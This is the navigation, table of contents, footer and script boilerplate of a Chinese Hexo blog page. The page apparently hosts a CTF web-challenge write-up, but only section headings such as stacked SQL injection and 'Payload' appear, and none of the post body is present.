                                <a class="prev"
                                   rel="prev"
                                   href="/2023/01/26/%E7%AE%80%E6%98%93CPU%E7%9A%84Verilog%E5%AE%9E%E7%8E%B0/"
                                   title="简易CPU的Verilog实现"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">简易CPU的Verilog实现</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2023/01/13/%E9%9B%86%E8%AE%ADWriteUp-1/"
                                   title="集训WriteUp-1"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">集训WriteUp-1</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#T1-hgame-2023-v2board"><span class="nav-text">T1 [hgame 2023]v2board</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#T2-hgame-2023-Search-Commodity"><span class="nav-text">T2 [hgame 2023]Search Commodity</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#T3-hgame-2023-Designer"><span class="nav-text">T3 [hgame 2023]Designer</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#T4-%E5%BC%BA%E7%BD%91%E6%9D%AF-2019-%E9%9A%8F%E4%BE%BF%E6%B3%A8"><span class="nav-text">T4 [强网杯 2019]随便注</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0-%E5%A0%86%E5%8F%A0%E6%9F%A5%E8%AF%A2%EF%BC%8CStacked-Queries"><span class="nav-text">堆叠注入学习(堆叠查询，Stacked Queries)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86"><span class="nav-text">堆叠注入原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%E5%88%A9%E7%94%A8"><span class="nav-text">堆叠注入利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Payload-1"><span class="nav-text">Payload 1</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%84%E5%A4%84%E7%90%86%E8%AF%AD%E5%8F%A5-%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-text">预处理语句+堆叠注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Payload-2"><span class="nav-text">Payload 2</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#T5-HCTF-2018-WarmUp"><span class="nav-text">T5 [HCTF 2018]WarmUp</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="nav-text">解题思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Payload"><span class="nav-text">Payload</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2022</span>&nbsp;-&nbsp;2024
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Latte</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            

            

            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-toggle-theme-mode flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#T1-hgame-2023-v2board"><span class="nav-text">T1 [hgame 2023]v2board</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#T2-hgame-2023-Search-Commodity"><span class="nav-text">T2 [hgame 2023]Search Commodity</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#T3-hgame-2023-Designer"><span class="nav-text">T3 [hgame 2023]Designer</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#T4-%E5%BC%BA%E7%BD%91%E6%9D%AF-2019-%E9%9A%8F%E4%BE%BF%E6%B3%A8"><span class="nav-text">T4 [强网杯 2019]随便注</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0-%E5%A0%86%E5%8F%A0%E6%9F%A5%E8%AF%A2%EF%BC%8CStacked-Queries"><span class="nav-text">堆叠注入学习(堆叠查询，Stacked Queries)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86"><span class="nav-text">堆叠注入原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%E5%88%A9%E7%94%A8"><span class="nav-text">堆叠注入利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Payload-1"><span class="nav-text">Payload 1</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%84%E5%A4%84%E7%90%86%E8%AF%AD%E5%8F%A5-%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-text">预处理语句+堆叠注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Payload-2"><span class="nav-text">Payload 2</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#T5-HCTF-2018-WarmUp"><span class="nav-text">T5 [HCTF 2018]WarmUp</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="nav-text">解题思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Payload"><span class="nav-text">Payload</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<!-- common -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/utils.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/header-shrink.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/back2top.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/toggle-theme.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/code-block.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/main.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/libs/anime.min.js"></script>

<!-- local-search -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/local-search.min.js"></script>


<!-- lazyload -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/lazyload.min.js"></script>


<div class="">
    
        <!-- post-helper -->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/post/post-helper.min.js"></script>

        <!-- toc -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/post/toc.min.js"></script>
        

        <!-- copyright-info -->
        

        <!-- share -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/post/share.min.js"></script>
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
